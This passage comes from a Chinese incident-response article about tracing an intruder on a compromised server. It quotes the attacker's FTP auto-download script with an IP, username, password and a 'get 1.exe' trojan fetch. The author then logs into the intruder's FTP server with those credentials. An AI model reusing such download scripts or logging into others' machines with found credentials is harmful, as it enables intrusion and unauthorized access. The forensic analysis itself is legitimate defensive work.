攻防实战：网络维护过程中的渗透与反渗透

核心提示： 图2 查找被修改的网站文件2.清除挂马代码在所有文件中查找代码“ ”将其清除，（二）系统入侵痕迹搜索和整理 1.查看入侵者遗留在系统中的痕迹对系统目录以及服务器所有目录进行文件查看，攻防实战：网络维护过程中的渗透与反渗透(2)，发现该入侵者使用过“143

图2 查找被修改的网站文件

2.清除挂马代码

在所有文件中查找代码“ ”将其清除。

（二）系统入侵痕迹搜索和整理

1.查看入侵者遗留在系统中的痕迹

对系统目录以及服务器所有目录进行文件查看，发现该入侵者使用过“1433全自动扫描传马工具”。通过对该工具软件的研究分析，该扫描工具中需要有配置文件，用来下载木马。果不其然，在系统目录下发现有一个文件cc1.txt生成日期是2008年5月29日，大小只有64个字节，用type命令显示如下：

open 122.138.14.8
gusdn
lixuanyu
binary
get 1.exe
bye

该文件是FTP自动下载的配置信息，直接使用CuteFTP软件进行ftp登陆尝试，填好IP地址和帐号密码，顺利登录如图3所示！从服务器上的东西不难看出，这台机器的FTP路径是Windows系统某个磁盘的根目录，里面有不少黑客用的工具，机主肯定是一个入侵者或者安全爱好者。

图3 成功登陆Ftp服务器

说明：

很多入侵者在利用网上下载的工具时，没有很好地设置和改造，只是进行简单的配置后，便开始攻击和入侵。因此，在肉机上经常留下各种木马的安装文件，有时甚至还有FTP自动上传文件的配置文件。可以使用“dir /od /a” 命令查看当前目录中的文件，如果存在小于100字节的文件，则这些文件极有可能为配置文件。

用扫描工具软件查看以下该计算机开放哪些端口，如图4所示，系统开放了80端口和远程终端服务3389端口。